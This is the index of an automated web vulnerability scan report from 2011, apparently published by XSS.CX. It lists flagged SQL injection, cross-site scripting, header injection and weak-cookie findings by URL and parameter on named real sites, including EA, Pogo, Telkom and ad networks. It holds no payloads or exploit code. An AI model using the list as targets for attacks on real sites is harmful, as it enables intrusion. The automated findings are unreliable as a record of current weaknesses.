XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06252011-01

Report generated by XSS.CX at Sat Jun 25 09:46:18 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://beta.telkom.co.id/op.php [icid parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

2. Cross-site scripting (stored)

2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

3. HTTP header injection

3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

3.3. http://sales.swsoft.com/buyonline/ [key parameter]

3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]

3.5. http://sales.swsoft.com/buyonline/ [os parameter]

3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]

3.7. http://sales.swsoft.com/buyonline/ [version parameter]

3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]

4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

4.63. http://display.digitalriver.com/ [aid parameter]

4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

4.65. http://display.digitalriver.com/ [tax parameter]

4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]

4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]

4.68. http://km5002.keymetric.net/KM2.js [hist parameter]

4.69. http://km5002.keymetric.net/KM2.js [lag parameter]

4.70. http://km5002.keymetric.net/KM2.js [las parameter]

4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]

4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]

4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]

4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]

4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]

4.76. http://km5002.keymetric.net/KM2.js [lca parameter]

4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]

4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]

4.79. http://km5002.keymetric.net/KM2.js [rho parameter]

4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]

4.81. http://km5002.keymetric.net/KM2.js [vid parameter]

4.82. http://s31.sitemeter.com/js/counter.js [site parameter]

4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]

4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]

4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]

4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]

4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]

4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.90. http://store.origin.com/store [objectID parameter]

4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]

4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]

4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]

4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]

4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]

4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]

4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]

4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]

4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]

4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]

4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]

4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]

4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]

4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]

4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]

4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]

4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]

4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]

4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]

4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]

4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]

4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]

4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]

4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]

4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]

4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]

4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]

4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]

4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]

4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]

4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]

4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]

4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]

4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]

4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]

4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]

4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]

4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]

4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]

4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]

4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]

4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]

4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]

4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]

4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]

4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]

4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]

4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]

4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]

4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]

4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]

4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]

4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]

4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]

4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]

4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]

4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]

4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.150. http://www.ea.com/json/user-menu [returnUrl parameter]

4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]

4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]

4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]

4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]

4.155. http://www.linkedin.com/countserv/count/share [url parameter]

4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]

4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]

4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]

4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]

4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]

4.163. http://support.ea.com/ [cp_session cookie]

4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]

4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]

5. Flash cross-domain policy

5.1. http://a.netmng.com/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://d.adroll.com/crossdomain.xml

5.4. http://d1.openx.org/crossdomain.xml

5.5. http://fls.doubleclick.net/crossdomain.xml

5.6. http://ib.adnxs.com/crossdomain.xml

5.7. http://idcs.interclick.com/crossdomain.xml

5.8. http://m.adnxs.com/crossdomain.xml

5.9. http://rcci.122.2o7.net/crossdomain.xml

5.10. http://segment-pixel.invitemedia.com/crossdomain.xml

5.11. http://swsoft.122.2o7.net/crossdomain.xml

5.12. http://wotifcom.112.2o7.net/crossdomain.xml

5.13. http://googleads.g.doubleclick.net/crossdomain.xml

5.14. http://static.ak.fbcdn.net/crossdomain.xml

5.15. http://www.facebook.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml

6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml

6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://everquest2.com/free_to_play

7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

7.4. http://www.telkomsel.com/product/blackberry/undefined

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://bh.contextweb.com/bh/set.aspx

9.2. http://clicktoverify.truste.com/images/pos_btn3.png

9.3. http://clicktoverify.truste.com/images/watch_btn3.png

9.4. http://clicktoverify.truste.com/pvr.php

9.5. http://l.sharethis.com/pview

9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

9.7. https://softlayer.parallelsmarketplace.com/store/index.php

9.8. https://softlayer.parallelsmarketplace.com/store/index.php

9.9. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

11. Open redirection

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://api.twitter.com/1/urls/resolve.json

12.3. http://www.ea.com/dynajs/gus.jsx

12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

12.5. http://a.netmng.com/

12.6. http://ad.doubleclick.net/click

12.7. http://ad.trafficmp.com/a/bpix

12.8. http://ads.lucidmedia.com/clicksense/pixel

12.9. http://ads.pointroll.com/PortalServe/

12.10. http://api.facebook.com/restserver.php

12.11. http://ar.voicefive.com/b/wc_beacon.pli

12.12. http://b.scorecardresearch.com/b

12.13. http://b.scorecardresearch.com/r

12.14. http://b.voicefive.com/b

12.15. http://bh.contextweb.com/bh/rtset

12.16. http://bh.contextweb.com/bh/set.aspx

12.17. http://ce.lijit.com/merge

12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

12.25. http://ib.adnxs.com/seg

12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

12.28. http://idcs.interclick.com/Segment.aspx

12.29. http://images.apple.com/global/nav/styles/navigation.css

12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

12.31. http://m.adnxs.com/msftcookiehandler

12.32. http://media.fastclick.net/w/get.media

12.33. http://media.fastclick.net/w/tre

12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

12.35. http://pixel.quantserve.com/pixel

12.36. http://pixel.rubiconproject.com/tap.php

12.37. http://r.openx.net/set

12.38. http://r.turn.com/r/beacon

12.39. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

12.40. http://segment-pixel.invitemedia.com/pixel

12.41. http://segments.adap.tv/data/

12.42. http://tracking.searchmarketing.com/welcome.asp

12.43. http://www.addthis.com/bookmark.php

12.44. http://www.facebook.com/login.php

12.45. http://www.facebook.com/sharer/sharer.php

12.46. http://www.xobni.com/csscache/1306529290/styles/chalupa.css

12.47. http://www.xobni.com/favicon.ico

12.48. http://www.xobni.com/javascripts/jquery.base64.min.js

12.49. http://www.xobni.com/javascripts/jquery.json-2.2.min.js

12.50. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

13. Cookie without HttpOnly flag set

13.1. http://beta.telkom.co.id/

13.2. http://listings.mapquest.com/apps/

13.3. http://ro-c.redorbit.com/modules/news/include/secureimage/image.veriword.php

13.4. http://sales.swsoft.com/buyonline/

13.5. https://softlayer.parallelsmarketplace.com/store/index.php

13.6. http://tracking.searchmarketing.com/welcome.asp

13.7. http://tracking.searchmarketing.com/welcome.asp

13.8. http://tracking.searchmarketing.com/welcome.asp

13.9. http://tracking.searchmarketing.com/welcome.asp

13.10. http://tracking.searchmarketing.com/welcome.asp

13.11. http://tracking.searchmarketing.com/welcome.asp

13.12. http://www.citibank.com/us/cards/exmbl/aos.jsp

13.13. http://www.citibank.com/us/cards/exmbl/exmb_personal.jsp

13.14. http://www.ea.com/dynajs/gus.jsx

13.15. http://www.phuket-travel.com/nightlife/fantasea.htm

13.16. http://www.phuket.com/andamanwhitebeach/

13.17. http://www.telkom-indonesia.com/

13.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

13.19. http://a.netmng.com/

13.20. http://aboutus.ea.com/

13.21. http://aboutus.ea.com/favicon.ico

13.22. http://ad.doubleclick.net/click

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ad.yieldmanager.com/unpixel

13.26. http://ads.lucidmedia.com/clicksense/pixel

13.27. http://ads.pointroll.com/PortalServe/

13.28. http://ar.voicefive.com/b/wc_beacon.pli

13.29. http://b.scorecardresearch.com/b

13.30. http://b.scorecardresearch.com/r

13.31. http://b.voicefive.com/b

13.32. http://bh.contextweb.com/bh/rtset

13.33. http://bh.contextweb.com/bh/set.aspx

13.34. http://ce.lijit.com/merge

13.35. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

13.36. http://d1.openx.org/afr.php

13.37. http://d1.openx.org/avw.php

13.38. http://d1.openx.org/ck.php

13.39. http://d1.openx.org/lg.php

13.40. http://d1.openx.org/spc.php

13.41. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

13.42. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

13.43. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

13.44. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

13.45. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

13.46. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

13.47. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

13.48. http://idcs.interclick.com/Segment.aspx

13.49. http://images.apple.com/global/nav/styles/navigation.css

13.50. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

13.51. http://media.fastclick.net/w/get.media

13.52. http://media.fastclick.net/w/tre

13.53. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

13.54. http://pixel.quantserve.com/pixel

13.55. http://pixel.rubiconproject.com/tap.php

13.56. http://r.openx.net/set

13.57. http://r.turn.com/r/beacon

13.58. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

13.59. http://segment-pixel.invitemedia.com/pixel

13.60. http://segments.adap.tv/data/

13.61. http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif

13.62. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

13.63. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

13.64. http://store.origin.com/store

13.65. http://support.ea.com/

13.66. http://support.ea.com/app/answers/detail/a_id/3628

13.67. http://support.ea.com/app/answers/detail/a_id/4394

13.68. http://thesearchagency.net/pixspike.php

13.69. http://vendorweb.citibank.com/HG

13.70. http://videogamevoters.org/index.php/modal/sc-soon

13.71. http://videogamevoters.org/js/index

13.72. http://videogamevoters.org/page/spud

13.73. http://www.addthis.com/bookmark.php

13.74. http://www.facebook.com/login.php

13.75. http://www.gamersdailynews.com/advertising/administration/www/delivery/ajs.php

13.76. http://www.gamersdailynews.com/advertising/administration/www/delivery/lg.php

13.77. http://www.googleadservices.com/pagead/aclk

13.78. http://www.mapquest.com/_svc/ad/getads

13.79. http://www.mapquest.com/_svc/apixel

13.80. http://www.mapquest.com/_svc/publishing/promo

13.81. http://www.mapquest.com/_svc/searchio

13.82. http://www.mapquest.com/cdn/_uac/adpage.htm

13.83. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

13.84. http://www.mapquest.com/icons/stop.png

13.85. http://www.metlife.com/system/css/components_home.css

13.86. http://www.metlife.com/system/css/global.css

13.87. http://www.metlife.com/system/js/vendor/optimost.js

13.88. http://www.onlinecomcast.com/

13.89. http://www.sdc.exxonmobil.com/dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif

14. Password field with autocomplete enabled

14.1. https://customersupport.ea.com/loginapp/cp/login.do

14.2. http://everquest2.com/free_to_play

14.3. https://store.playstation.com/external/index.vm

14.4. http://twitter.com/

14.5. http://twitter.com/

14.6. http://twitter.com/

14.7. http://www.facebook.com/login.php

14.8. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

14.9. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

14.10. http://www.telkomsel.com/product/blackberry/undefined

15. Source code disclosure

15.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

15.2. http://cdn.wn.com/or/js/underscore-0.6.0.js

15.3. http://cdn.wn.com/or/js/videoplayer-20110119-2.min.js

15.4. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js

15.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js

15.6. http://hotels.asiawebdirect.com/min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678

15.7. http://rates.asiawebdirect.com/asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625

15.8. http://rates.asiawebdirect.com/asahi/js/all_scripts_no_prototype2.jsi

16. Referer-dependent response

16.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.2. http://d1.openx.org/afr.php

16.3. http://use.typekit.com/k/dum7haf-e.css

16.4. http://www.facebook.com/plugins/like.php

16.5. http://www.facebook.com/plugins/likebox.php

16.6. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js

16.7. http://www.pogo.com/login/media/Pogo_General_LP_2.swf

16.8. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

17. Cross-domain POST

17.1. http://phuket.com/

17.2. http://phuket.com/

17.3. http://www.citibank.com/favicon.ico

17.4. http://www.phuket-travel.com/

17.5. http://www.phuket-travel.com/

17.6. http://www.phuket-travel.com/nightlife/fantasea.htm

17.7. http://www.phuket-travel.com/nightlife/fantasea.htm

17.8. http://www.phuket-travel.com/premium-packages/index.htm

17.9. http://www.phuket.com/andamanwhitebeach/

17.10. http://www.phuket.com/andamanwhitebeach/

17.11. http://www.phuket.com/islands/index.htm

17.12. http://www.phuket.com/islands/index.htm

18. Cross-domain Referer leakage

18.1. http://beta.telkom.co.id/products-services/index.html

18.2. http://beta.telkom.co.id/rss/SimplePie/index.php

18.3. http://beta.telkom.co.id/rss/SimplePie/index.php

18.4. http://clicktoverify.truste.com/pvr.php

18.5. http://cm.g.doubleclick.net/pixel

18.6. http://d1.openx.org/afr.php

18.7. http://d1.openx.org/afr.php

